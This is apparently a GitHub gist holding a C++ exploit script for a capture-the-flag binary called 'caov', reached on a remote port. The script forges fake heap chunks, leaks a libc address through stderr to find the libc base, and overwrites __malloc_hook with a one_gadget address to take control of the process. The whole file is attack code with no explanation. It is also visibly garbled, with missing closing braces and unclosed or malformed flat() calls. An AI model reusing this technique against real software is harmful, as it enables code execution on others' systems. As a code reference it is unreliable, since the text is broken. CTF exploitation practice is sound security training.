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Created February 13, 2021 22:38
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  • Save hkraw/435dfa3dd6525c2b72ce9c0b8e5dcb71 to your computer and use it in GitHub Desktop.
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#include <pwntools>
#include <string>
#include <iostream>
using namespace pwn;
// Process io("./caov");
Remote io("", 10306);
void set(std::string name, std::string key,
uint32_t keyLen, int64_t value) {
io.sendlineafter("choice: ", "2");
io.sendafter("name: ",name);
io.sendlineafter("length: ",std::to_string(keyLen));
if(keyLen == 0) { return ;}
io.sendlineafter("Key: ",key);
io.sendlineafter("Value: ",std::to_string(value));
struct Data {
char *key;
uint64_t value;
uint64_t change_count;
int year, month, day, hour, min, sec;
uint64_t offset_Data = 0x6032a0;
uint64_t offset_Name = offset_Data + 0x20;
uint64_t junk = 0x41414141;
uint64_t fake_chunk_addr = 0x603285;
int main() {
io.recvuntil("name: ");
io.sendlineafter("key: ", "HK");
io.sendlineafter("value: ",std::to_string(0x1337));
/* set( name, key , keyLen, val) */
std::string payload;
payload = flat(
0UL, 0x71UL,
offset_Data, 0UL,
0UL, 0x21UL,
junk, junk,
junk, junk,
junk, junk,
offset_Name+0x10, 0L,
junk, 0x81L,
0L, 0x21L,
); set(payload, "HKHK", 0 , 0); // 0
payload = flat(
0L, 0x71L,
fake_chunk_addr, 0L,
0L, 0L,
fake_chunk_addr - 0x5, junk,
junk, junk,
junk, junk,
0L, "\n"
); set(payload, "HK\n", 0x67, 0); //1
std::string payload2(11, 0);
payload2 += flat(offset_Name + 0x30);
set("HK\n",payload2,0x67,0); //2
io.sendlineafter("choice: ","1");
io.recvuntil("Key: ");
std::string leak_str = io.recv(6);
uint64_t libc_stderr_leak = u64(leak_str);
uint64_t libc_base = libc_stderr_leak - 0x3c4540;
uint64_t offset_malloc_hook = 0x3c3b10;
printf("[+] Libc base: %p\n",(void *)libc_base);
std::string final_payload_1;
final_payload_1 = flat(
0UL, 0x71UL,
offset_Data, 0UL,
0UL, 0x21UL,
fake_chunk_addr - 0x5, junk,
junk, 0x21L,
junk, junk,
offset_Name+0x10, 0L,
junk, 0x81L,
0L, 0x21L,
); set(final_payload_1, "hk", 0, 0);
std::string final_payload_2;
final_payload_2 = flat(
0UL, 0x71UL,
libc_base + offset_malloc_hook - 0x23, 0L,
0UL, 0x21UL,
offset_Name + 0x20, junk,
junk, 0x21L,
set(final_payload_2, "hk",0,0);
uint64_t one_gadget = libc_base + 0xef6c4;
std::string malloc_hook_overwrite;
malloc_hook_overwrite = flat(
"AAA", junk, junk,
);set("hk\n",malloc_hook_overwrite, 0x67, 0);
return 0;
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